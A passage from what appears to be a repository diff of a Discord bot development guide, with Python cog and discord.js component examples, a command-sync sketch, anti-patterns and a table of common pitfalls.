        bot.load_extension(f"cogs.{filename[:-3]}")

bot.run(os.environ["DISCORD_TOKEN"])
```
```python
# cogs/general.py
import discord
from discord.ext import commands

class General(commands.Cog):
    def __init__(self, bot):
        self.bot = bot

    @commands.slash_command(name="info", description="Bot information")
    async def info(self, ctx: discord.ApplicationContext):
        embed = discord.Embed(
            title="Bot Info",
            description="A helpful Discord bot",
            color=discord.Color.blue()
        )
        embed.add_field(name="Servers", value=len(self.bot.guilds))
        embed.add_field(name="Latency", value=f"{round(self.bot.latency * 1000)}ms")
        await ctx.respond(embed=embed)

    @commands.Cog.listener()
    async def on_ready(self):
        print("General cog ready")

def setup(bot):
    bot.add_cog(General(bot))
```
### Interactive Components Pattern

Using buttons, select menus, and modals for rich UX

**When to use**: Need interactive user interfaces; collecting user input beyond slash command options; building menus, confirmations, or forms
```javascript
// Discord.js - Buttons and Select Menus
const {
  SlashCommandBuilder,
  ActionRowBuilder,
  ButtonBuilder,
  ButtonStyle,
  StringSelectMenuBuilder,
  ModalBuilder,
  TextInputBuilder,
  TextInputStyle
} = require('discord.js');

module.exports = {
  data: new SlashCommandBuilder()
    .setName('menu')
    .setDescription('Shows an interactive menu'),

  async execute(interaction) {
    // Button row
    const buttonRow = new ActionRowBuilder()
      .addComponents(
        new ButtonBuilder()
          .setCustomId('confirm')
          .setLabel('Confirm')
          .setStyle(ButtonStyle.Primary),
        new ButtonBuilder()
          .setCustomId('cancel')
          .setLabel('Cancel')
          .setStyle(ButtonStyle.Danger),
        new ButtonBuilder()
          .setLabel('Documentation')
          .setURL('https://discord.js.org')
          .setStyle(ButtonStyle.Link) // Link buttons don't emit events
      );

    // Select menu row (one per row, takes all 5 slots)
    const selectRow = new ActionRowBuilder()
      .addComponents(
        new StringSelectMenuBuilder()
          .setCustomId('select-role')
          .setPlaceholder('Select a role')
          .setMinValues(1)
          .setMaxValues(3)
          .addOptions([
            { label: 'Developer', value: 'dev', emoji: '💻' },
            { label: 'Designer', value: 'design', emoji: '🎨' },
            { label: 'Community', value: 'community', emoji: '🎉' }
          ])
      );

    await interaction.reply({
      content: 'Choose an option:',
      components: [buttonRow, selectRow]
    });

    // Collect responses
    const collector = interaction.channel.createMessageComponentCollector({
      filter: i => i.user.id === interaction.user.id,
      time: 60_000 // 60 seconds timeout
    });

    collector.on('collect', async i => {
      if (i.customId === 'confirm') {
        await i.update({ content: 'Confirmed!', components: [] });
        collector.stop();
      } else if (i.customId === 'cancel') {
        await i.update({ content: 'Cancelled.', components: [] });
        collector.stop();
      }
    });
  }
};
```
## Anti-Patterns

### ❌ Message Content for Commands

**Why bad**: Message Content Intent is privileged and deprecated for bot commands.
Slash commands are the intended approach.

### ❌ Syncing Commands on Every Start

**Why bad**: Command registration is rate limited. Global commands take up to 1 hour
to propagate. Syncing on every start wastes API calls and can hit limits.
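One way to avoid syncing on every start is to guard the registration call behind a content hash of the command definitions. A minimal stdlib sketch: `sync_if_changed`, the state-file name, and `sync_fn` are illustrative, with `sync_fn` standing in for your library's actual registration call:

```python
import hashlib
import json
import pathlib

def sync_if_changed(commands, sync_fn, state_file):
    """Call the rate-limited sync_fn only when command definitions changed."""
    digest = hashlib.sha256(
        json.dumps(commands, sort_keys=True).encode()
    ).hexdigest()
    path = pathlib.Path(state_file)
    if path.exists() and path.read_text() == digest:
        return False  # unchanged - skip the registration API call
    sync_fn(commands)  # e.g. a REST PUT of the full command list
    path.write_text(digest)
    return True

# Demo with a stand-in sync function
calls = []
cmds = [{"name": "ping", "description": "Check latency"}]
state = pathlib.Path("demo_sync_state.txt")
state.unlink(missing_ok=True)  # clean slate for the demo

print(sync_if_changed(cmds, calls.append, state))  # first run syncs
print(sync_if_changed(cmds, calls.append, state))  # second run skips
state.unlink()  # tidy up
```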
### ❌ Blocking the Event Loop

**Why bad**: Discord gateway requires regular heartbeats. Blocking operations
cause missed heartbeats and disconnections.
## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Interactions must be acknowledged within 3 seconds | critical | Acknowledge immediately, process later |
| Privileged intents fail unless enabled | critical | Enable in Developer Portal first |
| Command registration is rate limited | high | Use a separate deploy script (not on startup) |
| Leaked token gives full bot control | critical | Never hardcode tokens |
| Bot invited without required permissions | high | Generate correct invite URL |
| Global commands take up to 1 hour to propagate | medium | Development: use guild commands |
| Blocking work causes missed heartbeats | medium | Never block the event loop |
| Modals must be the first response | medium | Show modal immediately |
1 skills/docx Symbolic link
@@ -0,0 +1 @@
docx-official

Some files were not shown because too many files have changed in this diff.